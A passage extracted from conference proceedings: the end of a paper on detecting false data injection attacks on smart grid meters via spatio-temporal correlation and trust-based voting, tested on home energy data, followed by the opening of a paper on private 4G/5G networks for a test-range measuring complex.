where matrix H - system configuration; vectors z , x & e – output measurements (voltage, electric current), state estimations (energy demand and supply) and meter measurement errors, respectively. Therefore, for a predicted state xˆ abnormal values can be detected by computing x ˆ 2-norm of its measurement residual z − H . It should be considered to be abnormal, if z − H is larger than a given threshold τ. This study assumes that an attacker has access to system configuration information, including network topology. It is also assumed that the attacker has the ability to manipulate the meter measurements by compromising either the meter or the communication between the meter and the control center. However, this attacker’s ability is limited as follows: Scenario I: Attacker has limited access to certain meters. This considers the possibility that some meters may be protected or inaccessible to an attacker for other reasons. Scenario II: Attacker has limited resources to compromise the meters. That is, an attacker can compromise any meter, but confines to compromising a finite number k of all meters. An explicit approach is to protect all sensor measurements from manipulation. However, this is not always possible. If an attacker can compromise k meter measurements, where k ≥ m − n + 1, m is the number of measurements, n is the number of state variables, then, according to [9], there always exist attack vectors that can inject false data without being detected even if an attacker has no ability choose which of the k meters will be compromised. This provides a minimum value for the number of meters that need to be protected. That is, a necessary condition for detecting false data is protection of at least n meters. However, this is not a sufficient condition. Protection of no more than 50% of sensors is still more economical and realizable. However, research [10] shows that this traditional approach can be easily circumvented if attackers can collect enough data and inject a special value that satisfies the relationship. Moreover, this approach can only detect group-level anomalies (each with multiple counters). Anomalies in each individual meter cannot be detected in this way [11]. Based on the behavioral approach, intrusion detection systems (IDS), as well as methods that process data similar to sensor networks, that is, receiving information about an event from several sources, are developed. IDSs deals with detecting intrusions into network data. Intrusions usually occur as anomalous patterns (point anomalies), although some methods sequentially model data and detect anomalous subsequences (collective anomalies). The main reason for these anomalies stems from attacks conducted by external hackers who want to gain unauthorized access to the network to steal information or disrupt it. In our case, this is a smart grid and false data injection. Challenge faced by anomaly detection techniques in this area is that the nature of anomalies is constantly changing over time as attackers adapt their network attacks to evade existing intrusion detection solutions. Yao Liu et al. [11] proposed their own approach for detecting false data injection targeting intelligent grids. This method is based on the combination of detection methods of traditional IDSs and physical models.
Method for Detecting FDI Attacks on Intelligent Power Networks
721
However, designing IDSs for smart grids is challenging due to the huge size of the grids and the heterogeneity of their components [12, 13]. Moreover, IDS developed for traditional IT systems would not necessarily be appropriate for an intelligent grid. They should be specially designed for smart grids to reduce the probability of false positive detections [13]. In general, anomaly detection using IDS is an advanced direction, but to be effective, specific algorithms within IDS should be considered. Models based on classification are also often used to identify anomalies. The most common ones are discussed below: Bayesian networks and rule-based detection method. Classification is used to learn a model (classifier) consisting a set of labeled data (training), and then range a test instance into one of the classes using the learned model (testing) [8, 14–16]. Classification-based anomaly detection methods operate in a similar manner to the two-phase method. In the training phase, the classifier is learning using the available training data. The test phase identifies a test instance as normal or abnormal using a classifier. Classification-based anomaly detection methods operate according to the following general assumptions: based on the labels available for the training phase, classificationbased anomaly detection methods can be grouped into two broad categories: multi-class and single-class anomaly detection methods. Multiclass anomaly detection methods assume that the training data contains labeled examples that belong to several normal classes. When the environment is heterogeneous and dynamic, machine learning based solutions are mostly applied. Statistical models and artificial intelligence (e.g., neural networks) are typical approaches used to distinguish anomalies from norms. Anomaly detection method based on neural networks includes two stages. First, a neural network is trained to learn the classes of normal behavior on the training data set. Second: each instance comes as an input to the neural network. A neural networkbased system can learn one or several classes of normal behavior. Replicative neural networks have been used to find anomalies by recognizing only one class. The widespread technology of Deep Learning neural networks is also successfully used to solve this problem. Nevertheless, these solutions are typically complex, which limits their scalability when applied to large complex networks such as smart grids. Therefore, to achieve a more balanced solution, additional assumptions are usually made to reduce the computational complexity. Spatially-temporal correlation is one of them. 3.3 Method Description To minimize the damage caused by FDI in smart grids, a real-time mechanism for detecting FDI attacks is used to assess the state based on the spatio-temporal correlations of the cyber state. Strongly spatially-temporally correlated intellectual components would be called “neighbors”. Potential anomalies can be detected by monitoring the temporal sequence of spatial correlations between state estimates. This detection mechanism can be divided into the following three phases. Phase 1. Recognition of the spatial pattern and estimation of temporal sequences. This phase simulates the current state of the smart grid based on data typical of its
722
V. Martovytskyi et al.
normal state (i.e., state without FDI attacks). The phase is a partially supervised process, as many other machine learning mechanisms. In this approach, correlation patterns are recognized between each pair of state estimates within the same correlation area, defined by the smart grid operators, instead of the whole network. A correlation area usually contains several smart meters, while a smart meter may simultaneously belong to multiple correlation areas. Defining correlation areas can ensure that all intelligence components are spatially and temporally correlated as required to solve the targeted issue. This structure also avoids high computational complexity when analyzing data in “high-dimensional” spaces. It is assumed that the true changes and errors in state estimations are normally distributed. Let s (t) denote the state estimation of a smart component i at current time t. The sequence of previous state estimates for smart component i by current time T can be represented as Si (t, T ) = (si (t − T ), si (t − T + 1), ..., si (t − 1))
(3)
Each pair of smart components i and j in correlation area G is considered. Based on the previous state estimates S (t, T ) and S j (t, T ), their Spatial Correlation Consistency Region (SCCR) can be calculated, which represents a set of all possible potentially correct pairs of estimates si (t) and sj (t) at current time t. If the current pair of estimates (s (t), sj (t)) belongs to the set defined by SCCR, the current estimates si (t) and sj (t) are consistent; otherwise, they are incompatible. Geometrically, SCCR can be approximated by a rotated ellipse, as shown in Fig. 3.
Fig. 3. Graphical representation of a spatial correlation consistency region
The center of the SCCR ellipse (s¯i (t), s¯j (t)) is calculated by using exponential weighted moving average (EWMA) for the previous estimations S i (t, T ) and S j (t, T ). The major and minor axes of the SCCR ellipse are calculated by using principal component analysis (PCA) based on the previous estimations S i (t, T ) and S j (t, T ). In this study PCA is a mathematical procedure for converting the results of several sources into two orthogonal principal components a→ and b→ (which define the rotation angle
Method for Detecting FDI Attacks on Intelligent Power Networks
723
θ) and their associated variances σa2 and σb2 . The lengths of these axes are setted as the three deviations 3σa and 3σb , which cover 99,46% of normal measurements. Phase 2. Trust based voting. After a correlation matching consistency between each pair of state estimations is obtained, trust-based voting is applied to identify the occurrences of anomalies. The adjacent meter is considered trusted for each meter if meters are consistent. This voting is divided into two rounds. In the first round, reliable state estimates are selected with due account for the state estimates of their correlation neighbors. For a smart component i in a correlation area G its correlation neighbor N i ⊂ G is defined as a set of all devices in G, excluding i, and its consistent neighbour Nic ⊆ N i is defined as a set of devices, where the state estimation (t) of each device j in Nic is consistent with the state estimation S(t). Figure 4 shows five state estimations and their interrelationships as an example.
Fig. 4. First and second rounds of voting
According to Fig. 4: NA = {B, C, D, E}, NE = {A, B, C, D}, NAc = {B, C, D, E}, NEC = {A}
(4)
Let |N i | i |Nic | represent the sizes of sets N i and Nic respectively. It is assumed that component i and its estimation S i (t) are likely to be reliable (LR) at time t, if |Nic |/|N i | ≥ 50%. Otherwise, it can be said that smart component i and its estimation Si (t) are likely to be anomalous (LA) at time. After the first round voting, smart component E and its current state estimation are LA while others are LR. After the first round voting, only LR components and their state estimations can be involved in e in the second round voting, such as A, B, C, D in the example presented above.
724
V. Martovytskyi et al.
For a smart component i NiLR ⊆ Ni is defined as the set of all LR components in the correlation area G excluding i; and NiR ⊆ NiLR is defined as the set of all LR components that are consistent with i. For instance, NELR = {A,, C,D} i NER = {A}. The second round voting for state estimation (t) has one of the following three results: – good, if
R N i LR N i
LR N
≥ 50% i |Ni | ≥ 50%; i
N R i LR N i
N LR
< 50% i |Ni | < 50%; i – unknown, otherwise. – abnormal, if
Thus, it can be can determined whether S (t) is good or abnormal if the majority of i-neighbors are labelled as LR at slot t; otherwise, the reliability of S i (t) cannot be determined due to the lack of reliable references. Phase 3. System state inference. “Good” indicates that current state estimation (t) is reliable, since it is highly correlated to other state estimations which are in the same correlation area G. This usually assumes that the state estimation is in a stable and probably normal state. On the contrary, “abnormal” indicates the value of (t) deviates from the majority of state estimations in the same correlation group. This can be due to either errors or FDI. “Unknown” occurs when there are not enough state estimations that can be regarded as reliable. This appears when there is a significant change among the state estimations in G due to real events that abruptly change the behavior of smart grid, or large-scale attacks, and which should be considered as an event that requires additional check by system administrators.
4 Experimental Studies 4.1 Test Stand Description To operate with this method, we use the data provided by the UMass Trace Repository, which is supported by the Laboratory for advanced system software (LASS) that investigates systems issues for distributed systems, ranging from large server clusters to networks of small sensors. The data have been collected as a part of the project “Smart *: Energy Consumption Optimization for Smart Buildings”. Smart * project aims to optimize household energy consumption with a particular focus on modern smart homes and the new opportunities offered by such homes. The project is based on several smart homes with a large set of components that provide the ability to collect real data. As part of the project the data are collected from multiple meters in six real homes. Each home includes a different combination of meters. All homes are located in Western Massachusetts, with no more precise location being disclosed. Traces are available during 2014–2016 in CSV format. For our study, we use meter data from Home A that is a 158 square meter twostory building with three permanent residents. The home has a total of eight rooms
Method for Detecting FDI Attacks on Intelligent Power Networks
725
including a basement. On the first floor there are a living room, a bedroom, a kitchen and a bathroom, the second story has two bedrooms and a bathroom. The home has no central air conditioner. The home has 35 wall switches, which are mainly designed to control lighting in rooms and closets. Two different meter models have been used to take readings: Insteon iMeter Solo and Z-Wave Smart Energy Switch from Aeon Labs. The iMeter is well applied for stable loads that rarely change power consumption, such as digital clocks, lamps, etc., but not appliable for loads with highly variable power consumption, such as TVs, computers and/or inductive loads, for instance refrigerators, vacuum cleaners etc. In the paper we consideres time intervals of 14 days, which is about 20,000 time stamps. The readings were taken every minute. In the readings obtained, a fairly large volume is occupied by readings close to zero (less than 0.005kW). When using the principal component method, these values should be ignored, since correspond to the absence of equipment activity and, therefore, do not correlate with other equipment. The average energy consumption of household appliances, according to statistics, is presented in Table 1. Table 1. Eergy consumption of different household appliances. Energy consuming device
Power, kW
Refrigerator
1
TV set
0.08
Quantity, pcs
Average daily operating time, h/day
Monthly consumption, kW * h
1
2
60
1
5
12
Washer
1.5
1
0.57
26
Electric kettle
2
1
0.25
15
PC
0.15
1
2
9
Vacuum cleaner
0.8
1
0.14
3
Sron
1
1
0.29
9
Microwave
1
1
0.2
6
Lighting (incandescent lamps)
0.6
10
0.3
54
4.2 Test Description 1. The input is a csv file with data. These data are used for training, and by the condition of the algorithm are reliable (that is, they do not contain false indicators or alarms). The file contains minute-by-minute power readings from 7 correlated smart meters for September 2016. Thus, in the the study 20,160 values for each smart meter are involved. 2. The correlation area (the list of smart meters passed to the method) is determined by smart grid operator, rather then automatically by the algorithm.
726
V. Martovytskyi et al.
3. Before the direct application of the algorithm, the data are processed - values less than 0.005 kW are rejected. These values do not correspond to the data used in the study of appliances and are considered as noise during transmission of meter readings. 4. Based on the training data S (t, T ) and S j (t, T ) taken before a given time T, the spatial correlation consistency region is computed for each pair of adjacent meters. The region is approximated by a rotated ellipse with the center at the point (si (t), s (t)), where s (t) is calculated by using an exponential weighted moving average. According to [8], this is a kind of weighted moving average, the weights of which decrease exponentially and never equal zero. It should be determined as follows: EWMA = α × pt + (1 − α) × EWMAt−1
(5)
where EWMAt —exponential moving average value at point t (the last value in a time series); EWMAt−1 —the exponential moving average value at point t-1 (previous value in a time series); pt - value of primary function at time t (the last value in a time series); α - coefficient of weight decreasing rate, takes values from 0 to 1, the lower its value, the greater the influence of the previous values on the current value of the average. The first value of the exponential moving average is usually taken equal to the first value of primary function: EWMA0 = p0 .
(6)
There is no mathematical formula for calculating optimal value of α coefficient; it is typically defined by the selection method. Selection criterion in this case is the minimization of the mean square error of the actual random variable value deviation from predicted value [8]: 1. Several values of α coefficient are selected. 2. The mean square error is calculated for each value of α. 3. The best value is taken to be the value of α at which the root mean square error is minimal. However, this approach is not applicable for real data, since the statistical series is constantly replenished with new readings of meters. In this regard, it is impossible to simultaneously fix α coefficient and comply with the criterion for minimizing the mean square error. For this purpose, following formula is used to calculate α coefficient: α=
2 , n+1
(7)
where n - smoothing interval. The advantage of this indicator over a simple moving average is the reduced latency. This is due to the fact that the oldest data has a negligible weight, and therefore the direction is established on the basis of the latest data. The major and minor axes of the ellipse are calculated by using principal component analysis. Two orthogonal principal components a and b define the major axe rotation angle, and the lengths of these axes are setted as the three deviations 3σa and 3σb .
Method for Detecting FDI Attacks on Intelligent Power Networks
727
In the general case, the process of principal components identification is as follows: 1. The new origin is moved to the found center of the data cloud - this is the zero principal component (PC0). 2. The direction of maximum data change is selected - this is the first principal component (PC1 is our main axis). 3. If the data are fully described, then one more direction should be chosen (PC2 - minor axis) perpendicular to the first, so as to describe that there is a change in the data, etc. The formal algorithm is as further described. Let there be given a matrix of variables X of dimension I × J, where I is the number of samples (rows), and J is the number of independent variables (columns). The principal component method searches for new variables (principal components) ta (a = 1… A), which is a linear combination of the original variables xj (j = 1,… J): ta = pa1 x1 + ... + paj xj
(8)
Using these new variables, the matrix X is decomposed into the product of two matrices T and P: X = TP t + E
(9)
T is the score matrix of dimension I × A. P is the loading matrix of dimension J × A. E is the residual matrix of dimension I × J. An important property of PCA is the orthogonality (independence) of the principal components. Therefore, the score matrix T should not be rebuilt with an increase in the number of components, one more column that corresponds to new direction is simply added. The same should be done with the load matrix P. According to the three sigma rule, this ellipse (Fig. 5) covers 99.46% of normal observations. 1. A new value to be checked for anomalies is passed to the method for each of meters at the same moment T. An abnormal value can be injected both in one separate smart meter and in several simultaneously. For each pair of adjacent counters, we check the belonging of the value (S (T ), Sj (T )), where i and are the numbers of the corresponding counters. If the value belongs to an ellipse, the pair is consisted; otherwise, it is inconsistent. Ater a correlation matching consistency between each pair is obtained, trust-based voting is used to detect anomalies. The voting is divided into two different rounds and is detailed in Sect. 3.2 in phase 2 of this paper. The data for injection are generated based on the method described in Sect. 2.3 of this paper. 2. Datasets from the UMass Trace Repository are also used to simulate FDI attacks. The data have been split into two parts: the first part of the 14 days data is used for training and compiling a database of matching areas for meters being tested; the second part, belonging to the time period immediate after the training, is used as the basis for modelling the attack described in [7]. To identify the threshold for detecting anomalous data, the programmed algorithm iterates over the injection values in 0.01 kW increments. Moreover in this study the
728
V. Martovytskyi et al.
Fig. 5. Spatial correlation consistency region example
number of compromised meters is determined, whereby anomalies are no longer detected by the method. 3. It has to be considered that the standard system behavior can naturally change during operation time. This can be due to both season changes (and an increase in energy consumption) and changes in the behavior of housemates. Thus, in order to make the proposed method more flexible during long-term use, extra training on the updated dataset has been added to the first phase - the phase of pattern formation. During operation, the system accumulates meter statistics that have been classified as “good”, without interference and injection. When a sufficient amount of data reliable according to the method is obtained, the system has to be extra trained on a new dataset, which takes into account gradual changes in operating conditions. 4.3 Detection Results In total, 1145 attacks were carried out: 735 attacks on individual meters in the kitchen and one hundred and fifty - in the bathroom; 260 attacks on two or more meters were simultaneously conducted. 32 attacks have not been detected. This can be explained by a very small increase in the false value compared to the spread during normal operation of appliance. Total sum of type I errors was 2.7%. Furthermore, data were transferred 96 times without injection, and 6 false positives occurred (6.2% of type II errors). The reason for this was the weak correlation between meters, which caused the consistency to be determined incorrectly. After reconfiguring neighbor connections between meters, the number of false positives has significantly decreased. If injections were made only into one meter from the set, then the injection was detected when its deviation from the normal value of the following thresholds was reached (Table 2).
Method for Detecting FDI Attacks on Intelligent Power Networks
729
This spread of threshold values is due to the appliance average consumption and the spread of readings permissible for it (Fig. 6). Table 2. Energy consumption of different electrical appliances. Meter
Threshold, kW
Kitchen Freezer
0.01
Electric stove
0.55
Sockets in the kitchen
0.01
Lighting in the kitchen
0.20
Dishwasher
0.61
Fridge
0.20
Microwave
0.22
Bathroom Washer
0.03
Dryer
0.10
Sockets in the bathroom
0.02
Lighting in the bathroom
0.13
Central lighting
0.10
Central sockets
0.10
Fig. 6. Detection of large (a) and minor (b) injection in one meter
If injections were made into several meters at once, then the proposed method successfully detected injections in several meters, similarly to detection in one (Fig. 6a, b). Accordingly, if the injection was below the average detection threshold of the meters, some of them with higher power perceived this injection as standard behavior and, therefore, did not detect (Fig. 7). However, when more than half of meters were injected at the voting stage, they were deprived of their trusted neighbors, therefore it was impossible to make the system state
730
V. Martovytskyi et al.
Fig. 7. Detection of simultaneous injections in multiple meters
inference based on current data, the situation required additional analysis. Nonetheless, the network operator received information that the normal operation of the network was disrupted.
5 Conclusions This paper considers the problem of detection of FDI attacks in Smart Grids. With the active implementation of this technology and the growing number of attacks on the energy sector, this problem seems to be very urgent. In the paper a method for detecting FDI attacks based on space-time correlation and considering natural changes in intelligent grid operation has been proposed. The method includes 2 stages - recognition of the spatial pattern and voting. The efficiency and effectiveness of the method were confirmed by experimental studies of data from the UMass Trace Repository, which is supported by the laboratory for advanced system software (LASS). The number of type I errors was 2.7%, type II - 6.2%, which suggests that this method can be successfully applied to detect FDI attacks in smart grids.
References 1. Obinna, U., Joore, P., Wauben, L., Reinders, A.: Comparison of two residential Smart Grid pilots in the Netherlands and in the USA, focusing on energy performance and user experiences. Appl. Energy 191, 264–275 (2017). https://doi.org/10.1016/j.apenergy.2017. 01.086 2. Smart Grid Market – Global Industry Analysis and Forecast (2017–2026). https://www.max imizemarketresearch.com/. Accessed 21 Nov 2020
Method for Detecting FDI Attacks on Intelligent Power Networks
731
3. Giordano, V., Gangale, F., Fulli, G., Sánchez Jiménez, M.: Smart grid projects in Europe: lessons learned and current developments. JRC Reference Reports (2011) 4. Mukhin, V., et al.: Decomposition method for synthesizing the computer system architecture. In: Hu, Z., Petoukhov, S., Dychka, I., He, M. (eds.) ICCSEEA 2019. AISC, vol. 938, pp. 289– 300. Springer, Cham (2020). https://doi.org/10.1007/978-3-030-16621-2_27 5. Zhang, Y., Chen, W., Gao, W.: A survey on the development status and challenges of smart grids in main driver countries. Renew. Sustain. Energy Rev. 79, 137–147 (2017). https://doi. org/10.1016/j.rser.2017.05.032 6. 2020data breach investigations report. https://enterprise.verizon.com/resources/reports/2020data-breach-investigations-report.pdf. Accessed 21 Jan 2021 7. Rostyslav, G., Martovytskyi, V., Sievierinov, O., Soloviova, O., Kortyak, Y.: A method for identifying and countering HID attacks-virus detection in BMP images. Int. J. Emerg. Trends Eng. Res. 8(7), 2923–2926 (2020). https://doi.org/10.30534/ijeter/2020/07872020 8. Kurt, M.N., Yılmaz, Y., Wang, X.: Real-time detection of hybrid and stealthy cyber-attacks in smart grid. IEEE Trans. Inf. Forensics Secur. 14(2), 498–513 (2018). https://doi.org/10. 1109/TIFS.2018.2854745 9. Anwar, A., Mahmood, A.N., Pickering, M.: Modeling and performance evaluation of stealthy false data injection attacks on smart grid in the presence of corrupted measurements. J. Comput. Syst. Sci. 83(1), 58–72 (2017). https://doi.org/10.1016/j.jcss.2016.04.005 10. The Smart Grid: an Introduction. Prepared for the US Department of Energy by Litos Strategic Communication under Contract No DE-Ac26-04NT41817, p. 58 (2010) 11. Yao, L., Reiter, M.K., Ning, P.: False data injection attacks against state estimation in electric power grids. In: Proceedings of the 16th ACM Conference on Computer and Communications Security, CCS 2009, pp. 21–32. ACM, New York (2009). https://doi.org/10.1145/1952982. 1952995 12. Shamraev, A., Shamraeva, E., Dovbnya, A., Kovalenko, A., Ilyunin, O.: Green microcontrollers in control systems for magnetic elements of linear electron accelerators. In: Kharchenko, V., Kondratenko, Y., Kacprzyk, J. (eds.) Green IT Engineering: Concepts, Models, Complex Systems Architectures. SSDC, vol. 74, pp. 283–305. Springer, Cham (2017). https://doi.org/10.1007/978-3-319-44162-7_15 13. Chen, P., Yang, S., McCann, J.A., Lin, J., Yang, X.: Detection of false data injection attacks in smart-grid systems. IEEE Commun. Mag. 53, 206–213 (2015). https://doi.org/10.1109/ MCOM.2015.7045410 14. Ruban, I., Martovytskyi, V., Lukova-Chuiko, N.: Designing a monitoring model for cluster supercomputers. Eastern-Eur. J. Enterp. Technol. 6(2), 32–37 (2016). https://doi.org/10. 15587/1729-4061.2016.85433 15. Yao, L., Ning, P., Reiter, M.K.: False data injection attacks against state estimation in electric power grids. ACM Trans. Inf. Syst. Secur. (TISSEC) 14, 1–33 (2011) 16. Kuchuk, G., Kovalenko, A., Komari, I.E., Svyrydov, A., Kharchenko, V.: Improving big data centers energy efficiency: traffic based model and method. In: Kharchenko, V., Kondratenko, Y., Kacprzyk, J. (eds.) Green IT Engineering: Social, Business and Industrial Applications. SSDC, vol. 171, pp. 161–183. Springer, Cham (2019). https://doi.org/10.1007/978-3-03000253-4_8
Implementation of Private 4G/5G Networks for Polygon Measuring Complex Provision Igor Shostko
and Yuliia Kulia(B)
Kharkiv National University of Radio Electronics, 14 Nauky Ave., Kharkiv, Ukraine {ihor.shostko,yuliia.kulia}@nure.ua
Abstract. This work is devoted to the research of world experience in implementation of private 4G/5G networks. Private 4G/5G is a network created within one organization. It is based on the same technology as public networks of this standard, however, it is not connected to public infrastructure, or connected only partially. Each of its elements, from sensors to the control center, are located within a closed circuit. In this research, network structure is seen with consideration of peculiarities in the working process of polygon measuring complex. The comparison of structure types of private 4G/5G networks was made. The possibility of connection of the equipment, which uses different standards of wireless connection, already existing on a polygon to a 4G/5G network was assessed as well. Keywords: private 4G/5G network · polygon measuring complex · optoelectronic station
1 Introduction Intense usage of digital technologies coincided with the beginning of a new age in the telecommunication field. New telecommunication technologies appeared, which ensure that usage of specific network element configurations and work of network itself are performed with compliance to the performance indicators requirements, while simultaneously meeting high standards for stability of functioning, overcoming various catastrophic and dead-end situations: failures, “hanging” of the network, “broken” routes, etc. The difference between information and telecommunication systems became unclear and a new term “infocommunication” appeared. Infocommunication networks are currently used in all spheres of society and the state. But if services of an infocommunication network were mostly consumed by people before, nowadays various devices, video cameras and sensors are connected to a network. Most of the world’s well-known factories are planning to switch to fully automatic operation. The new production lines will be serviced by the Internet of Things. A large number of high-resolution cameras will be used to monitor production. Network video surveillance in automatic mode will monitor the status of various stages of production. Network video surveillance systems are beginning to play an important role in law enforcement, monitoring compliance with traffic rules on the roads, monitoring airspace © The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 E. Faure et al. (Eds.): ITEST 2022, LNDECT 178, pp. 732–748, 2023. https://doi.org/10.1007/978-3-031-35467-0_43
Implementation of Private 4G/5G Networks
733
near airports, detecting and monitoring ground and air targets in military conflict zones, and testing equipment on modern military landfills. 4G technologies (and in the near future 5G-based) will play a crucial role in the transmission of video streams in all these tasks of the infocommunication network. For implementation of specific tasks of communication in various spheres of society and the state, it is recommended to use private 4G/5G networks [1–5]. The main advantages of private networks are high reliability and security while maintaining high speed and low latency. Private 4G/5G networks solve problems that cannot be solved by public infrastructure or Wi-Fi deployed in the enterprise. It is resistant to interference, well-secured and gives high signal throughput indoors. By organizing such a network, a company gets its own controlled and stable digital environment for data transmission, as well as the ability to safely use modern digital tools - voice connection, video monitoring, remote control, robotics and more. In the framework of this article the peculiarities of use and structure of private 4G/5G networks used for maintenance of the polygon measuring complex (PMC) are considered. One of the tasks of the PMC is video monitoring of the flight of an aircraft, a missile, or a projectile that is being tested. In order to achieve this, a network of optoelectronic stations (OES) is created, which follows the flight of the target. Each OES in its area of responsibility is programmed to follow the target on the projected section of the trajectory. The programming process is automated and carried out simultaneously for all OESs. The work of all OESs is synchronized. The tasks of the OES, which will be the first to follow the target, are: – to determine the inconsistency in the parameters of its projected and actual trajectory; – to transfer guidance corrections to all other OESs. Based on this data, the coordinates of the expected capture point of each OES target are adjusted. The number of OESs in the PMS is determined depending on the test tasks. Trajectory measurements should be performed by direction-finding method. This way two OESs are simultaneously monitoring the movement of one object and determining its coordinates as a function of time. The work of the OESs is synchronized by the unified time system. The structure of the network is built in a way that allows the two routers to synchronously serve a pair of OESs, and then the next pair and so on (Fig. 1) [6]. The sequence of the survey is set according to the order of work of each pair of OES on the target. The following information is circulating in the PMC network. 1) From the polygon command center (PCC) to each OES: - designators for guiding the OES to a given point of the flight path of the target that is being tracked; - prohibition of work on the chosen target command; - time synchronization. 2) From each OES to the PCC of the polygon: - coordinates of the location of the OES at the polygon; - confirmation of readiness to follow the target; - confirmation of success in following the target. 3) Between individual OESs:
734
I. Shostko and Y. Kulia
Fig. 1. Structural scheme of the OES network
- corrective amendments to the trajectory of the target being followed. 4) The video stream from each OES following the target is broadcast in real time to the polygon command center. Then all video data is processed. Calculations of all trajectory parameters are performed. The flight trajectory of the target is plotted on a topographic base. Thus, the problems to solve in PMC are distributed both in time and space. Therefore, when designing a 4G/5G network, it is recommended to take into account these peculiarities.
2 The Purpose and Objectives of the Study Object of the study. The process of building a distributed structure of private 4G/5G networks. Subject of the study. Methods of using private 4G/5G networks to provide a polygon measuring complex. The purpose of the study is to develop recommendations for the construction of private 4G/5G networks, which ensures the operation of a polygon measuring complex. Achieving this goal requires the solution of the following scientific and technical problems: 1. analysis of the structure and peculiarities of use of private 4G/5G networks;
Implementation of Private 4G/5G Networks
735
2. methods of building a distributed structure of private 4G/5G networks, taking into account the tasks of a PMC; 3. means of support of various wireless communication technologies of the devices connected to 4G/5G networks.
3 Usage Of Private 4G/5G Networks For Providing A Polygon Measuring Complex 3.1 Features of Using a Private 4G Network, Compatibility with Other Wireless Technologies There is a particular category of LTE-networks - these are private networks for businesses. The private network is built almost in the same way as the usual coverage of a mobile operator. The components are the same. The difference is that this network has a geographical limitation - it is built only for one facility, for example, a test site for aircraft, for which a separate infocommunication structure is needed. Infrastructure that manages, analyzes and monitors the network can be centrally located in one place or separately from the facility. There are three main options for managing the infocommunication structure of the polygon. 1. For self control. In case the company built the network independently, it has an opportunity to support their staff and perform maintenance without involving a third party. 2. For outsourcing. A mobile operator builds the infrastructure, transfers it for use to a company and is engaged in maintenance. 3. On full support. Private networks can be hired on managed services conditions, when construction, planning and maintenance are performed by a vendor. Since it is not enough to buy equipment and build a network, and you still need to obtain the appropriate license to use frequencies, the easiest way for a company is to work with mobile operators. The operator already has a license and the process will be much faster and easier. The main advantages of a private network are high reliability and security while maintaining high speed and low delays. Private LTE solves problems that the public LTE infrastructure cannot handle. It is resistant to obstacles and well-secured. LTE uses end-to-end encryption with strong cryptographic algorithms for data transmission. By organizing such a network to ensure the operation of a polygon measuring complex (PMC), a testing site receives its own controlled and stable digital environment for data transmission. And with it - the ability to safely use modern digital tools: voice communication, video monitoring, remote control, robotics during the testing process. A large number of OESs with the ability to film in high resolution is used to monitor the tests at the polygon. Thus, it is possible to automatically monitor the status of various
736
I. Shostko and Y. Kulia
stages of testing. It is also possible to connect a video surveillance system for the territory and airspace in the area of the test site to a private LTE to ensure safety of the tests. LTE technology (and 5G-based in the near future) will play a crucial role in video streaming in all these tasks. LTE has a maximum multi-user capacity that allows you to simultaneously connect multiple OESs, hundreds of camcorders, sensors or other measuring equipment to a single access point (base transceiver station) (BTS) or eNodeB in cellular technology without negatively impacting performance. Finally, LTE supports full mobility with handoff at speeds of up to 350 km/h, providing a stable connection with maintenance vehicles, mobile PMCs and the control center. The end-to-end delay of private LTE networks is usually in the range of 9–15 ms, and in future releases the delay will be 2–8 ms. In addition to supporting applications with high data rates and low latency, the latest LTE standards support new classes of devices with low data rates (LTE-M and NB-IoT), which allows you to control various electric drives (such as slewing drives of OESs), connect many different sensors to the PMC. However, there is a huge number of devices in the PMC that use other wireless technologies. For example, OESs that have been connected via Wi-Fi. It is advantageous for the consumer to continue to use them instead of changing them for new ones. Therefore, it is advisable to implement these requirements in Private LTE. The first option to support various wireless technologies is based on MulteFire technology [7]. Nokia MulteFire’s new user equipment and Nokia MulteFire access point are designed for use with the Nokia DAC platform, which provides easy and quick setup of a private wireless connection. Nokia MulteFire’s private wireless solution is suitable for both permanent network connection and temporary deployment in cases such as short-term use of the terrain or water area during testing. Another solution for the creation of private LTE networks, and in the future 5G, was the “Citizens Broadband Radio Service (CBRS)”, implemented in the United States [8, 9]. The basic architecture for private LTE [10] is shown in Fig. 2. The network includes radio access, devices and the core network. Differences in network construction using MulteFire or CBRS technology will be present at the level of subscriber access organization. The advantages of implementing a private LTE network to ensure the operation of the PMC at the test polygon are. 1) Security and privacy. As the network is physically separated from the public infrastructure, the IT system is protected from external influences and intrusion. Each device on the network has a unique identifier that allows administrators to control the set of connections. Service information never leaves the organization’s network. 2) Flexibility. In a private network, the customer determines the density of the infrastructure and the load on the network, so unforeseen failures are virtually ruled out. It also sets the
Implementation of Private 4G/5G Networks
737
Fig. 2. LTE local area network architecture
acceptable delay settings, which is important for device synchronization. In most cases, if necessary, Private LTE provides the ability to switch devices to public LTE. 3) Compatibility with infrastructure. Private networks can be connected to almost all systems in the APC, including video surveillance, video monitoring and ECO management, and internal communications. Private LTE is well compatible with various communication technologies. 4) Possibility of upgrade. LTE is used as a technological base for the development of 5G. This means that networks now operate on the LTE standard, but there is a technical possibility to convert them to 5G. 3.2 Structure, Features Of Use And Advantages Of Private 5G Networks For Providing A Polygon Measuring Complex Private 5G network can be created in two ways, Fig. 3. The first is to deploy a physically isolated private 5G network (5G “island”), which is independent of the mobile operator’s public 5G network. In this case, the private 5G network can be built by facilities that are organized by the test polygon or mobile operators. In any case, coordination with regulatory authorities is required. The second is the creation of private 5G networks by
738
I. Shostko and Y. Kulia
sharing the public 5G network resources of the mobile operator. In this case, a private 5G network for the PMC is built by a mobile operator. Isolated private 5G network that does not depend on the public 5G network of the mobile operator
Privat 5G Network
Privat 5G Network
PMC at the test site
Deploy private 5G Network by sharing mobile 5G Network resources of mobile operators
Operators 5G Network
Operators 5G Network
PMC at the test site
Internet, DN 5GC-CP N2 N9 N6 5G gNB N3
UPF MEC
N6 N2
5G gNB
DN
N3
5GC-CP N9
UPF
Network Slicing
MEC
Public 5G Network (Voice, Internet, etc.)
5GC-CP N9
N2
5G gNB
N3
UPF MEC
Public 5G Network (Voice, Internet, etc.) 5GC-CP
Internet, DN
N2 5G gNB
UPF
N3 MEC
N6 Internet, DN
Fig. 3. The ways of creating a private 5G network, where:
